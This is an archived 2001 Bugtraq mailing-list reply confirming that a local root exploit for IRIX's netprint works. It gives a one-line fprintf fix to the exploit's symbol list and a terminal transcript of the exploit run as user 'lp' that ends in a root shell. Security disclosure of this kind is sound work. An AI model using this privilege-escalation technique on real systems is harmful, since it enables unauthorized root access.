[20502] in bugtraq
Re: IRIX /usr/lib/print/netprint local root symbols exploit.
daemon@ATHENA.MIT.EDU (Thomas-Martin Kruel)
Sat Apr 28 17:54:12 2001
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Message-ID: <3AEB0DCE.19919.3B5170@localhost>
Date: Sat, 28 Apr 2001 18:37:02 +0200
Reply-To: kruel@mbi-berlin.de
From: Thomas-Martin Kruel <kruel@mbi-berlin.de>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010428060001.4E85424CA26@lists.securityfocus.com>
I tested against 6.5.10m and it works.

Just add

    fprintf(symbol,"void ListAllPrinters(){}\n");

to the list of symbols and execute the exploit as user "lp":
% whoami
lp
% ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# whoami
root
The "lp" account, however, is no longer left open by default since 6.5, AFAIK.
Thomas.
---
Max-Born-Institut fuer Nichtlineare Optik und Kurzzeitspektroskopie
Max-Born-Strasse 2A, D-12489 Berlin, Germany
Head of IT - Thomas-Martin Kruel
mailto: kruel@mbi-berlin.de Tel. 030 / 6392-1540, Fax: -1509, Mobile: 0170 / 9247486
Support: http://www.mbi-berlin.de/edv
mailto: support@mbi-berlin.de Tel. 030 / 6392-1555, Pager: alarm@mbi-berlin.de